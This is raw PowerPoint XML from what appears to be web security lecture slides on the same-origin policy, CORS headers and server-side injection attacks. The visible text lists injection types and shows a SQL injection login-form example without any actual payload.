          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6760329" y="2128237"/>
            <a:ext cx="1794806" cy="804472"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6600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ad.com  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="CustomShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA16A5E4-F806-EE25-2C16-5868D2C49304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6760329" y="3173392"/>
            <a:ext cx="1852359" cy="804472"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00FFFF"/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b.com  </a:t>
            </a:r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7165339C-FB4A-7699-191C-DDE836F8BF26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5640288" y="2369376"/>
            <a:ext cx="1008112" cy="322194"/>
          </a:xfrm>
          <a:prstGeom prst="lef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0C2C11B2-DBAF-E65E-2479-63DC542251CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5640288" y="3464268"/>
            <a:ext cx="1008112" cy="322194"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow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FAC17DAC-46F4-3776-1794-2DB63F1A5455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20832135">
            <a:off x="5577385" y="1497683"/>
            <a:ext cx="1008112" cy="322194"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00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9FD3402-9FA7-C6FB-3ABF-3A52E52DD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40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SOP tricky details: CORS (Cross-Origin Resource Sharing) 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/>
              <a:t>In many settings, SOP is too strict.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Using CORS, a website can relax the SOP policy to allow some cross-origin requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>For example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB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Access-Control-Allow-Origin: *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>   allows any cross-origin requests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GB" sz="18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Access-Control-Allow-Origin: https://trusted.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>   allows cross-origin requests from a specific origin</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We won’t go into CORS in this course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57</a:t>
            </a:fld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26A84B9-9791-E5FC-E511-8D1A7311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330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stomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5842879" y="2184366"/>
            <a:ext cx="2581560" cy="16766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web server</a:t>
            </a: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48645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Server-side injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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2AEC77-7434-46CA-BE34-C63E21E2B0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3068303" y="2032618"/>
            <a:ext cx="274312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malicious  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="40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Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-GB" sz="36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Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3322340" y="2584495"/>
            <a:ext cx="2319842" cy="4980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7030A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189" y="1971982"/>
            <a:ext cx="712803" cy="783299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885346" y="2162927"/>
            <a:ext cx="2042714" cy="14914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-1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browser</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="24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143" y="1618792"/>
            <a:ext cx="1014882" cy="1014882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\erikpoll\Desktop\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0888" y="1592064"/>
            <a:ext cx="975537" cy="975537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 rot="1800000" flipH="1" flipV="1">
            <a:off x="7376330" y="2548497"/>
            <a:ext cx="72000" cy="72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hthoek 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4554908" y="2760618"/>
            <a:ext cx="200697" cy="160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hthoek 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2400000" flipH="1" flipV="1">
            <a:off x="6963535" y="2516401"/>
            <a:ext cx="130995" cy="14705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hthoek 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4863446" y="2750285"/>
            <a:ext cx="200697" cy="160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hthoek 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4228684" y="2754942"/>
            <a:ext cx="200697" cy="1609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Curved Down Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6845529" y="1700808"/>
            <a:ext cx="964700" cy="576064"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 67231"/>
              <a:gd name="adj3" fmla="val 27442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ounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7461506" y="1885697"/>
            <a:ext cx="117267" cy="54441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49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6927536" y="1870579"/>
            <a:ext cx="202993" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="161925">
            <a:solidFill>
              <a:srgbClr val="FF0000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roomdiagram: Magnetische schijf 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143809" y="4305414"/>
            <a:ext cx="1624046" cy="1064368"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL database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47730C3F-1E88-E0E4-1A28-1F15764F1064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7858274" y="4338684"/>
            <a:ext cx="745526" cy="523311"/>
            <a:chOff x="7941274" y="4074284"/>
            <a:chExt cx="745526" cy="523311"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rechthoek 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1800000" flipH="1" flipV="1">
              <a:off x="8396322" y="4185512"/>
              <a:ext cx="56233" cy="587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echthoek 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2400000" flipH="1" flipV="1">
              <a:off x="8011742" y="4197052"/>
              <a:ext cx="102309" cy="1200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5" name="Afbeelding 3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41274" y="4074284"/>
              <a:ext cx="745526" cy="523311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F018EF-7EB9-BA00-653D-1303A31E76AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7287404" y="3463733"/>
            <a:ext cx="498058" cy="1016162"/>
            <a:chOff x="7287404" y="3463733"/>
            <a:chExt cx="498058" cy="1016162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Right Arrow 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="3530335">
              <a:off x="7028352" y="3722785"/>
              <a:ext cx="1016162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38" name="Straight Arrow Connector 41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7402873" y="3806607"/>
              <a:ext cx="117267" cy="54441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1"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7515553" y="3981312"/>
              <a:ext cx="107811" cy="87936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29952" y="2304630"/>
            <a:ext cx="901639" cy="64105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4593EF-295C-2449-B1F0-D4D96484FD49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4661988" y="3806607"/>
            <a:ext cx="914400" cy="91440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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p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OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F070403050403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BE4DF55-79DD-DD85-65A1-83BCAEAD2802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5722952" y="4295635"/>
            <a:ext cx="1170948" cy="88470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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>system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28A37D-56DE-A38E-88E8-E6E6ECF3B155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="4795825">
            <a:off x="5573507" y="3181667"/>
            <a:ext cx="498058" cy="1016162"/>
            <a:chOff x="7287404" y="3463733"/>
            <a:chExt cx="498058" cy="1016162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Right Arrow 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CE6FFBF-142B-3ACC-7AB1-3A18C10D8619}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="3530335">
              <a:off x="7028352" y="3722785"/>
              <a:ext cx="1016162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23" name="Straight Arrow Connector 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89476FEB-A905-3173-2916-722719BA039F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7402873" y="3806607"/>
              <a:ext cx="117267" cy="54441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41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3910EAA8-03DA-2273-42BC-5ECEB0B79D15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7515553" y="3981312"/>
              <a:ext cx="107811" cy="87936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A5B80E-5404-9713-F92C-682932AA8AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="3684785">
            <a:off x="6132541" y="3570935"/>
            <a:ext cx="498058" cy="1016162"/>
            <a:chOff x="7287404" y="3463733"/>
            <a:chExt cx="498058" cy="1016162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Right Arrow 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88FE8BA7-4A39-F421-6EAD-26ACEF7A6D41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="3530335">
              <a:off x="7028352" y="3722785"/>
              <a:ext cx="1016162" cy="498058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  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Arrow Connector 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4259F40-362E-29E3-17B6-E9EEF824E6E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7402873" y="3806607"/>
              <a:ext cx="117267" cy="54441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ABFB615B-1408-62F9-4F8B-A13155EACAD2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7515553" y="3981312"/>
              <a:ext cx="107811" cy="87936"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="161925">
              <a:solidFill>
                <a:srgbClr val="FF0000"/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4F885AFC-EA2C-2F7D-BEA0-0A370F055FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4815492" y="3800048"/>
            <a:ext cx="600141" cy="373457"/>
            <a:chOff x="7941274" y="4074284"/>
            <a:chExt cx="745526" cy="523311"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Rechthoek 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC7150C5-01D2-49FF-D207-5874D49B7F7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1800000" flipH="1" flipV="1">
              <a:off x="8396322" y="4185512"/>
              <a:ext cx="56233" cy="587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hthoek 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65EA58D3-DCD6-9FEE-E37B-FC3E0FB78063}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2400000" flipH="1" flipV="1">
              <a:off x="8011742" y="4197052"/>
              <a:ext cx="102309" cy="1200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Afbeelding 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D0D9FA-3217-689E-E36F-231728749C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41274" y="4074284"/>
              <a:ext cx="745526" cy="523311"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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112607F-7189-C80A-9606-49A95336CF7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6350424" y="4420536"/>
            <a:ext cx="600141" cy="373457"/>
            <a:chOff x="7941274" y="4074284"/>
            <a:chExt cx="745526" cy="523311"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rechthoek 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1093E6F6-A497-3FE4-29ED-1EDE728DF3E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1800000" flipH="1" flipV="1">
              <a:off x="8396322" y="4185512"/>
              <a:ext cx="56233" cy="5877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hthoek 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EFF8579-162B-ED40-A20D-803CD40C6E89}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2400000" flipH="1" flipV="1">
              <a:off x="8011742" y="4197052"/>
              <a:ext cx="102309" cy="1200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4" name="Afbeelding 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59C3F6DC-D364-9BA1-3250-8FB631112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41274" y="4074284"/>
              <a:ext cx="745526" cy="523311"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Afbeelding 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7262325B-4219-7D12-9E32-992FB9C3F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447" y="3858821"/>
            <a:ext cx="494026" cy="542885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Afbeelding 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87304B0F-BBF1-9927-1A32-AB1B1BDFC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143" y="3455984"/>
            <a:ext cx="453233" cy="498058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Afbeelding 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A132EA-6458-34F8-77A7-20E15EFCB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73" y="4077384"/>
            <a:ext cx="339845" cy="373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91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60149-7D2E-5625-D337-AF5B728B6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Injection attacks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D08E-69AA-E8B6-A051-1570334EB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33CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Path traversal aka directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL injection (SQLi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>....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Recurring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>theme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:  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0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Special characters or keywords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that have a special meaning in a certain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> determines a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> OS commands, file names, SQL, HTML, URL, ...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Recurring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anti-pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Concatenating strings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and processing the result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34C60-90D2-62B9-DA9F-1990689D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websec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F50189-517E-E9BA-8DF4-BEB38EF0C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AEC77-7434-46CA-BE34-C63E21E2B0B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0668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SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1741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/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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/>
          </a:p>
        </p:txBody>
      </p:sp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66195EEF-4C82-41E8-B990-E16BD49DFFB3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8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2051050" y="1989138"/>
            <a:ext cx="5041900" cy="3781425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF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2051050" y="1808163"/>
            <a:ext cx="5041900" cy="180975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC"/>
          </a:solidFill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563813" y="2890838"/>
            <a:ext cx="1643062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Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Username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568575" y="3430588"/>
            <a:ext cx="1643063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0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Password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4211638" y="2889250"/>
            <a:ext cx="1981200" cy="4603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9900"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>erik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a: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    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4211638" y="3429000"/>
            <a:ext cx="1981200" cy="4603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solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>******</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>    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06207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/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2150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dirty="0"/>
